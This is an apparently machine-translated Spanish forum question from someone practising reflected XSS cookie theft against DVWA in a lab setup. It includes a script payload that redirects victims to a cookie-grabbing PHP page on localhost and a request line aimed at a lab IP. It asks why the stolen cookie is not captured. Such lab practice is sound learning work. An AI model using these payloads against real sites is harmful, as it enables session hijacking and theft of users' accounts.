Estoy tratando de explotar una vulnerabilidad reflejada XSS en DVWA, para robar cookies. Actualmente, logré integrar la siguiente carga útil en una solicitud HTTP que redirigirá a la víctima para que cargue y ejecute un archivo php cookie.php
.
La siguiente carga útil, si se ingresa en el cuadro de búsqueda, cargará un archivo php.
<script>document.location.href="http://localhost:81/myfiles/cookie.php"</script>
Por lo tanto, me gustaría incrustar esta carga útil en una página maliciosa (a la que la víctima accederá). Esto es el aspecto de la página maliciosa.
Cuando el usuario carga esta página maliciosa, se debe cargar un php file para robarle la cookie a la víctima y luego Escríbelo en un archivo. Esto no sucede a pesar del hecho de que la carga útil se repite con éxito al navegador de la víctima. Reviso esto imprimiendo la respuesta HTTP y busqué mi carga útil. Aquí hay una prueba de concepto. Entonces, a pesar de que la carga útil se entregó con éxito al navegador de la víctima, el archivo php no se cargó.
Este exploit funcionará si carga cookie.php
Mi segunda pregunta es: supongamos que quiero hacer esto en un escenario de laboratorio real donde tengo dos máquinas en la misma red virtual. 192.168.56.102
está ejecutando un servidor web y tiene el capturador de cookies. ¿Funcionará la página maliciosa si solo cambio las direcciones IP? Quiero decir ... en lugar de localhost en el puerto 81, ¿cambiarlo a IP en el puerto 81?
Sé que esto probablemente no funcionaría porque si hago esto:
http.open("GET","http://192.168.56.102:81/vulnerabilities/xss_r/?name="+encoded_url,true);
No se le asignará una cookie porque esta "pregunta" no se dirige a la sesión de mi navegador, sino a la IP del servidor.
Claramente, puedes ver que estoy casi allí (y quizás un poco perdido) pero realmente puedo usar algunos comentarios sobre esto. ¿Qué piensa usted al respecto?